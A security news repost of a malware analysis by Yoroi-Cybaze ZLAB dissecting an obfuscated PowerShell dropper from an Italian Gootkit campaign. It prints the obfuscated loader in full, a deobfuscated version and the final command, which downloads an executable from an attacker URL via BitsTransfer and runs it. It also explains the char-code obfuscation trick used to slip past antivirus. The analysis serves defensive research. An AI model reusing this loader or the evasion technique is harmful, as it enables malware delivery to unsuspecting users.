The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.
Introduction
Few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign attacking several Italian users. The attack wave contained some interesting techniques need to look into further, especially regarding the obfuscation used to hide the malicious dropping infrastructure.
The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims, finding an inner powershell payload designed to actually download the malicious Gootkit binary from the attacker’s infrastructure. This inner script was carefully obfuscated in a clever and unseen way.
Technical Analysis
The Powershell code executed by the initial VBS script appears as following:
- ( ‘…..’|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${‘} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${“[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${“@} =”[” +”$(@{ } ) “[${ *-} ] + “$(@{})”[ “${/.}” +”${#~=}” ]+ “$(@{ })”[“${*~}”+”${@}”]+”$? “[${/.} ]+”]” }{${#/~} = “”.(“$( @{} )”[ “${/.}${)@}” ]+”$(@{ }) “[“${/.}${;}”] + “$( @{ } ) “[ ${@}]+ “$(@{} ) “[ ${)@}]+ “$?”[${/.}] + “$( @{ } ) “[${$./} ])}{${#/~} =”$( @{} ) “[ “${/.}${)@}”] + “$( @{ } )”[${)@}] +”${#/~}”[ “${*~}${ *-}”]} ); .${#/~} (“${#/~} (${“@}${/.}${@}${‘} + ${“@}${/.}${@}${*~} +${“@}${)@}${@}+ ${“@}${$./}${;}+${“@}${/.}${@}${)@} +${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;} +${“@}${)@}${;}+${“@}${/.}${/.}${“[+}+${“@}${/.}${@}${/.}+${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${‘}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${@}+${“@}${)@}${;}+ ${“@}${/.}${@}${#~=} + ${“@}${#~=}${ *-}+ ${“@}${/.}${@}${;}+ ${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${)@}+ ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${/.}${@}${“[+} + ${“@}${/.}${/.}${;}+ ${“@}${$./}${*~} +${“@}${‘}${/.} + ${“@}${)@}${/.}+ ${“@}${/.}${*~}${$./} + ${“@}${ *-}${$./}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${;}+ ${“@}${)@}${‘}+${“@}${ *-}${ *-}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${@}+ ${“@}${/.}${/.}${ *-}+${“@}${/.}${@}${“[+} +${“@}${/.}${@}${/.}+${“@}${$./}${*~} +${“@}${;}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${;}+${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@}+ ${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${@}${*~} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${)@} + ${“@}${/.}${*~}${‘}+${“@}${$./}${*~} +${“@}${“[+}${$./} + ${“@}${/.}${/.}${;} + ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} + ${“@}${;}${;} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@} +${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${‘}+${“@}${/.}${@}${*~} +${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${)@} + ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${“[+}${$./}+ ${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${ *-} + ${“@}${/.}${/.}${)@}+ ${“@}${#~=}${#~=}+${“@}${/.}${@}${/.} + ${“@}${$./}${*~}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${‘}+${“@}${‘}${“[+}+ ${“@}${)@}${ *-}+${“@}${)@}${ *-}+${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${)@} + ${“@}${/.}${@}${/.} + ${“@}${/.}${@}${@} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${/.} + ${“@}${)@}${;}+${“@}${/.}${@}${#~=}+ ${“@}${#~=}${ *-}+${“@}${/.}${/.}${;} +${“@}${/.}${/.}${;} +${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${@}+${“@}${/.}${/.}${‘}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${#~=} + ${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${‘} +${“@}${/.}${/.}${;} + ${“@}${)@}${;}+ ${“@}${#~=}${#~=} + ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${#~=}+ ${“@}${)@}${ *-} + ${“@}${#~=}${#~=}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${/.}${@}+${“@}${/.}${@}${‘} + ${“@}${/.}${/.}${“[+} + ${“@}${)@}${ *-}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@} + ${“@}${/.}${/.}${;}+${“@}${/.}${@}${/.}+ ${“@}${/.}${/.}${)@}+${“@}${)@}${;} + ${“@}${/.}${/.}${*~}+ ${“@}${/.}${@}${)@} +${“@}${/.}${/.}${*~} + ${“@}${‘}${‘} +${“@}${$./}${*~}+${“@}${)@}${‘}+${“@}${;}${“[+}+ ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@}+ ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${@} +${“@}${$./}${*~} + ${“@}${$./}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} + ${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} +${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;} +${“@}${/.}${*~}${@}+ ${“@}${/.}${@}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${#~=}+ ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@} + ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${ *-}+${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=}+ ${“@}${)@}${;}+${“@}${/.}${@}${/.} +${“@}${/.}${*~}${@}+${“@}${/.}${@}${/.} + ${“@}${‘}${#~=}+ ${“@}${$./}${*~}+ ${“@}${“[+}${$./} + ${“@}${/.}${/.}${;}+${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} +${“@}${“[+}${@}+${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${/.}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${‘} +${“@}${$./}${*~} +${“@}${$./}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} +${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${@}${#~=} + ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+ ${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;}+${“@}${/.}${*~}${@}+${“@}${/.}${@}${;} +${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${ *-} +${“@}${/.}${@}${ *-} + ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${#~=}+${“@}${)@}${;} +${“@}${/.}${@}${/.} + ${“@}${/.}${*~}${@} + ${“@}${/.}${@}${/.} )”)
It seems a set of random special characters without any meaning. However, the Powershell interpreter can execute it quietly. So, after an accurate analysis, it is possible to see some pattern in the weird characters following the “$” symbol: in Powershell language is possible to declare variables using the pattern ${variable_name}, including any character between the braces, special characters doesn’t make exception. For instance, some of variable names in the script above are:
- ${#/~}
- ${@}
- ${;}
- ${“@}
- ${#~=}
- ${/.}
- ${*~}
Replacing these variable names with some more readable and meaningful characters makes the script easier to analyze:
- ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
-
- .$var1 (“$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ $var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 +$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)
The first instruction of the script sets the variable values to some fixed strings, derived from a series of wasteful concatenation operations:
- ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
After the execution of this instruction, the values contained into the variables are:
- $var1 = “iex”
- $var2 = “0”
- $var3 = “1”
- $var4 = “2”
- $var5 = “3”
- $var6 = “4”
- $var7 = “5”
- $var8 = “6”
- $var9 = “7”
- $var10 = “8”
- $var11 = “9”
- $var12 = “[CHar]”
The second piece of code concatenates the above values in order to compose a powershell command string. Each single character of the generated command is represented as ASCII decimal numbers leveraging the variables above as alphabet (i.e. “$var12$var3$var2$var7” becomes “[CHar]105”) . The decoding of the entire instruction results in:
- iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 +[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 + [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )
At this point, a simple ASCII to char conversion make possible to decode and recover the final powershell command, unveiling the code purpose. It imports the BitsTransfer cmdlet (Background Intelligent Transfer Service) and proceeds to download and execute the GootKit malware.
- if($host.version.major -lt 3){
- Import-Module BitsTransfer
- }
- Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
- Start-Process $env:temp\ksjxjewuhukew.exe
Conclusion
The initial script, at a first impression, seems obfuscated using some sophisticated techniques. However, analyzing its actual code shows how the clever usage of simple tricks such as variable replacement or decimal encoding, is able to hide a clearly malicious Powershell script, making it nearly undetectable by common anti-malware engines.
This analysis and many others are available on the official blog of the Yoroi cyber security firm.
https://blog.yoroi.company/research/dissecting-the-mindscrew-powershell-obfuscation/
| [adrotate banner=”9″] | [adrotate banner=”12″] |
Pierluigi Paganini
(Security Affairs – Powershell , VBScript)
[adrotate banner=”5″]
[adrotate banner=”13″]